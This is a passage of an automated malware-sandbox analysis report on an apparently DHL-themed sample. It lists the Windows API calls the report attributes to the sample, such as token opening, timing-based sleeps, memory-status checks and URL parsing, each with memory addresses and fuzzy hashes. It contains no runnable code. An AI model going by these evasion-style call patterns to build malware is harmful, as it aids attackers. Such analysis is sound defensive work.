                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                                      • String ID:
                                                                                      • API String ID: 1352324309-0
                                                                                      • Opcode ID: f8e03fe767d189af9dc61ebf1110eba5f5264a73807d1d5e809b6da89c90bf94
                                                                                      • Instruction ID: 59224724d7a42d4c8db3ce3f829b2b7020472c30ad268bc604f35f74ee6d3a09
                                                                                      • Opcode Fuzzy Hash: f8e03fe767d189af9dc61ebf1110eba5f5264a73807d1d5e809b6da89c90bf94
                                                                                      • Instruction Fuzzy Hash: AF1161B5A053159FE7208F15DC09B927FFCEB00B04F109569A6A6F6191D7B0F948DB60
                                                                                      APIs
                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E0ACD3,?,00008000), ref: 00E0B0C4
                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E0ACD3,?,00008000), ref: 00E0B0E9
                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E0ACD3,?,00008000), ref: 00E0B0F3
                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E0ACD3,?,00008000), ref: 00E0B126
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                      • String ID:
                                                                                      • API String ID: 2875609808-0
                                                                                      • Opcode ID: 664f290ea274e0f9a4f868e49633f892885dd0ec715241b62c80f7d60e45875a
                                                                                      • Instruction ID: fdb215b51275d008947692e5cdfb96745b656a4efccfcd331440adc31874c59b
                                                                                      • Opcode Fuzzy Hash: 664f290ea274e0f9a4f868e49633f892885dd0ec715241b62c80f7d60e45875a
                                                                                      • Instruction Fuzzy Hash: 66116131C0252CDBCF049FE5E9586EEBF78FF19711F105085D941B3181CB3095949B51
                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E02DC5
                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E02DD6
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00E02DDD
                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E02DE4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2710830443-0
                                                                                      • Opcode ID: 08ad649302ac34ef132221c173829aa013bbb5a9595cdeb2290e88bdef7f31ae
                                                                                      • Instruction ID: 35adc490583e5ab808c8c66d637d1beae160102cfd483176a2f94d7f8c840a7b
                                                                                      • Opcode Fuzzy Hash: 08ad649302ac34ef132221c173829aa013bbb5a9595cdeb2290e88bdef7f31ae
                                                                                      • Instruction Fuzzy Hash: 45E06D711012287BDB201B639C0EEEB3EACEB42FA1F101019B206F10809AA1C884C7B0
                                                                                      APIs
                                                                                        • Part of subcall function 00DB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DB9693
                                                                                        • Part of subcall function 00DB9639: SelectObject.GDI32(?,00000000), ref: 00DB96A2
                                                                                        • Part of subcall function 00DB9639: BeginPath.GDI32(?), ref: 00DB96B9
                                                                                        • Part of subcall function 00DB9639: SelectObject.GDI32(?,00000000), ref: 00DB96E2
                                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00E38887
                                                                                      • LineTo.GDI32(?,?,?), ref: 00E38894
                                                                                      • EndPath.GDI32(?), ref: 00E388A4
                                                                                      • StrokePath.GDI32(?), ref: 00E388B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                      • String ID:
                                                                                      • API String ID: 1539411459-0
                                                                                      • Opcode ID: a614d52f7d9e167440710394ae7c1abdae5517ac85cf10b07a0b1fafe6acf135
                                                                                      • Instruction ID: 8c9f269fa24fbf0218b1912ccc5c443a40d58eb51ade3a18bbd86f8e1c5d4f8b
                                                                                      • Opcode Fuzzy Hash: a614d52f7d9e167440710394ae7c1abdae5517ac85cf10b07a0b1fafe6acf135
                                                                                      • Instruction Fuzzy Hash: 75F09A36001298FADB125F99AC0DFCA3F29AF46310F508000FB02750E2C7748555CFA5
                                                                                      APIs
                                                                                      • GetSysColor.USER32(00000008), ref: 00DB98CC
                                                                                      • SetTextColor.GDI32(?,?), ref: 00DB98D6
                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00DB98E9
                                                                                      • GetStockObject.GDI32(00000005), ref: 00DB98F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$ModeObjectStockText
                                                                                      • String ID:
                                                                                      • API String ID: 4037423528-0
                                                                                      • Opcode ID: eb74321b567b0db36cd2f374bad5ddb23458d6c67974270db71aa383bc780b45
                                                                                      • Instruction ID: 0f8552593cfe7f54a8f6792313190753e4039c5e2586ac86c310bcce9ed45253
                                                                                      • Opcode Fuzzy Hash: eb74321b567b0db36cd2f374bad5ddb23458d6c67974270db71aa383bc780b45
                                                                                      • Instruction Fuzzy Hash: 8BE06531244288AEDF215B75AC0DBE83F21AB11335F18C219F7FA740E1C37186449B20
                                                                                      APIs
                                                                                      • GetCurrentThread.KERNEL32 ref: 00E01634
                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E011D9), ref: 00E0163B
                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E011D9), ref: 00E01648
                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E011D9), ref: 00E0164F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                      • String ID:
                                                                                      • API String ID: 3974789173-0
                                                                                      • Opcode ID: 8028fbc908995ebefd345b7fda9f2bfb753c894825fb2f2a01cf53b8cbac43d0
                                                                                      • Instruction ID: e41682bfc199fcf52914b21479848d344052e5229681cc181d2994cf7c1237d5
                                                                                      • Opcode Fuzzy Hash: 8028fbc908995ebefd345b7fda9f2bfb753c894825fb2f2a01cf53b8cbac43d0
                                                                                      • Instruction Fuzzy Hash: DEE04632602215AFD7201BA2AE0DB863F78AF44796F248848F245F9090E624C4898B60
                                                                                      APIs
                                                                                      • GetDesktopWindow.USER32 ref: 00DFD858
                                                                                      • GetDC.USER32(00000000), ref: 00DFD862
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DFD882
                                                                                      • ReleaseDC.USER32(?), ref: 00DFD8A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2889604237-0
                                                                                      • Opcode ID: 92635837dc7d2e4f5c8963f6dac547f0fca392ecf74e4f7b1dd4aac98f477529
                                                                                      • Instruction ID: 9721e67bb94a4108a7a6650d5e70bf593df2583157b32c0310d1de3600ea4dac
                                                                                      • Opcode Fuzzy Hash: 92635837dc7d2e4f5c8963f6dac547f0fca392ecf74e4f7b1dd4aac98f477529
                                                                                      • Instruction Fuzzy Hash: 0DE01AB1800208DFCB41AFA1D80D66DBFB2FB08710F208409F846F7260C738C906AF60
                                                                                      APIs
                                                                                      • GetDesktopWindow.USER32 ref: 00DFD86C
                                                                                      • GetDC.USER32(00000000), ref: 00DFD876
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DFD882
                                                                                      • ReleaseDC.USER32(?), ref: 00DFD8A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2889604237-0
                                                                                      • Opcode ID: 3ae68ed376fa1d4d88d32e6004a257eb0beef86a40e77ecf4ac22f785ef81038
                                                                                      • Instruction ID: 3f8e5fc8ef314657cb8ece6f9929913c9044a42c8bbb3635c6e6b164dfee2bb6
                                                                                      • Opcode Fuzzy Hash: 3ae68ed376fa1d4d88d32e6004a257eb0beef86a40e77ecf4ac22f785ef81038
                                                                                      • Instruction Fuzzy Hash: 31E01A71800208DFCB40AFA1D80D66DBFB1FB08710F208408F846F7260C73899069F50
                                                                                      APIs
                                                                                        • Part of subcall function 00DA7620: _wcslen.LIBCMT ref: 00DA7625
                                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00E14ED4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Connection_wcslen
                                                                                      • String ID: *$LPT
                                                                                      • API String ID: 1725874428-3443410124
                                                                                      • Opcode ID: d63f9f93adcb8ba69f60b16a5f5b96f34db9caa8e72208246dc4119d2dfa03d1
                                                                                      • Instruction ID: 765e51ea637fb8348ca5b57af1d6cd6983c67d7a33a0f208239dc5cbd310583f
                                                                                      • Opcode Fuzzy Hash: d63f9f93adcb8ba69f60b16a5f5b96f34db9caa8e72208246dc4119d2dfa03d1
                                                                                      • Instruction Fuzzy Hash: B89140B5A002049FCB14DF54C484EE9BBF5EF49318F199099E4066F392D731ED86CB61
                                                                                      APIs
                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00DCE30D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorHandling__start
                                                                                      • String ID: pow
                                                                                      • API String ID: 3213639722-2276729525
                                                                                      • Opcode ID: b3eab3a632270696b9c94858cef0c59d1f0891036ceac836a3b49d53117c93f0
                                                                                      • Instruction ID: bd45df713a731b28344e846a01a3f734322b8c3e64b2b0f689c0319fe63ed5de
                                                                                      • Opcode Fuzzy Hash: b3eab3a632270696b9c94858cef0c59d1f0891036ceac836a3b49d53117c93f0
                                                                                      • Instruction Fuzzy Hash: BD513BA1A0C203DACB157714C901B796B94EB40741F684DDEF0D5933A9FB34CC969A76
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(00DF569E,00000000,?,00E3CC08,?,00000000,00000000), ref: 00E278DD
                                                                                        • Part of subcall function 00DA6B57: _wcslen.LIBCMT ref: 00DA6B6A
                                                                                      • CharUpperBuffW.USER32(00DF569E,00000000,?,00E3CC08,00000000,?,00000000,00000000), ref: 00E2783B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: BuffCharUpper$_wcslen
                                                                                      • String ID: <s
                                                                                      • API String ID: 3544283678-2940880691
                                                                                      • Opcode ID: 1f83f7920ab21e710fc0118660f730baab8bec1ea79a6656fd7d025ee2d93905
                                                                                      • Instruction ID: 29233f576acd83f91d21b27e19517a4b36e84322e55297a10509a9ef6299f7b2
                                                                                      • Opcode Fuzzy Hash: 1f83f7920ab21e710fc0118660f730baab8bec1ea79a6656fd7d025ee2d93905
                                                                                      • Instruction Fuzzy Hash: E8614A32914228EACF04EBA4DC91DFDB374FF55304B546129E582B7191EF24AA49CBB0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #
                                                                                      • API String ID: 0-1885708031
                                                                                      • Opcode ID: 6a208ef16a588f67832febbeb231e8b5c0594ebea290b9ed92f8be6cac7600dc
                                                                                      • Instruction ID: 8859413911fe2600e5127591295fa0742e67adc8da864594554a88eea8ee9b74
                                                                                      • Opcode Fuzzy Hash: 6a208ef16a588f67832febbeb231e8b5c0594ebea290b9ed92f8be6cac7600dc
                                                                                      • Instruction Fuzzy Hash: 2D51233550425ADFDB19EF28C481AFE7BA5EF56310F288065E9929B2E0D734DD42CBB0
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(00000000), ref: 00DBF2A2
                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00DBF2BB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                      • String ID: @
                                                                                      • API String ID: 2783356886-2766056989
                                                                                      • Opcode ID: bec69cd53e977925e2d21fa9815590596e112a07ec2e56cab6428b255c270897
                                                                                      • Instruction ID: 2fbd9d94d47b0eb8a0e6a68d6d84f7c410cd2c661d61604f8bb738aeafe86620
                                                                                      • Opcode Fuzzy Hash: bec69cd53e977925e2d21fa9815590596e112a07ec2e56cab6428b255c270897
                                                                                      • Instruction Fuzzy Hash: C55132724187889FD320AF11DC86BABBBF8FF85310F81885DF199511A5EB7085298B66
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00E257E0
                                                                                      • _wcslen.LIBCMT ref: 00E257EC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: BuffCharUpper_wcslen
                                                                                      • String ID: CALLARGARRAY
                                                                                      • API String ID: 157775604-1150593374
                                                                                      • Opcode ID: 25a0dcb3bda0e701542283d51dee7362636a1d5cdb253278bf7726acf5d3abf3
                                                                                      • Instruction ID: a87c38a1a966117e37fb0ec720d582da9d490512bb79c7a63512760c04c50430
                                                                                      • Opcode Fuzzy Hash: 25a0dcb3bda0e701542283d51dee7362636a1d5cdb253278bf7726acf5d3abf3
                                                                                      • Instruction Fuzzy Hash: 76418E32E002199FCB08DFA8D9869FEBBF5EF59324F145029E505B7291D7749D81CBA0
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 00E1D130
                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E1D13A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CrackInternet_wcslen
                                                                                      • String ID: |
                                                                                      • API String ID: 596671847-2343686810
                                                                                      • Opcode ID: 2697da73173091b5c871b73c32c0cb4fc33683d637cd78bd0988d23ec3b6f632
                                                                                      • Instruction ID: 6b372c969d94efd3b9e04bafa93088c277c4ed71aafa769b850ceb83d1877841
                                                                                      • Opcode Fuzzy Hash: 2697da73173091b5c871b73c32c0cb4fc33683d637cd78bd0988d23ec3b6f632
                                                                                      • Instruction Fuzzy Hash: 92312A72D01219ABCF15EFA4CC85AEEBFB9FF05304F104019F815B6166EB35AA46CB60
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00E33621
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E3365C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$DestroyMove
                                                                                      • String ID: static
                                                                                      • API String ID: 2139405536-2160076837
                                                                                      • Opcode ID: 267170bb568cf10ab58e3c673af27b9e74bfe6eddf3f3d206ea3b0d51252cb07
                                                                                      • Instruction ID: cf945a2d4510c73630e4673fde44faba0464509f2facf20a340bfea943cdbebf
                                                                                      • Opcode Fuzzy Hash: 267170bb568cf10ab58e3c673af27b9e74bfe6eddf3f3d206ea3b0d51252cb07
                                                                                      • Instruction Fuzzy Hash: D4317C71110204AEDB24DF38DC45EBB77A9FF88724F10A619F9A5A7290DA31E991C760
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00E3461F
                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E34634
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: '
                                                                                      • API String ID: 3850602802-1997036262
                                                                                      • Opcode ID: aa3de6511815235eb8f36ea8a549b4c517a9a88ff000109d7ebc761ccd522a5d
                                                                                      • Instruction ID: 2d67c6ac6225cdea8329dae6d42459dc9c9472e42b2d80dcc170f37fc1239539
                                                                                      • Opcode Fuzzy Hash: aa3de6511815235eb8f36ea8a549b4c517a9a88ff000109d7ebc761ccd522a5d
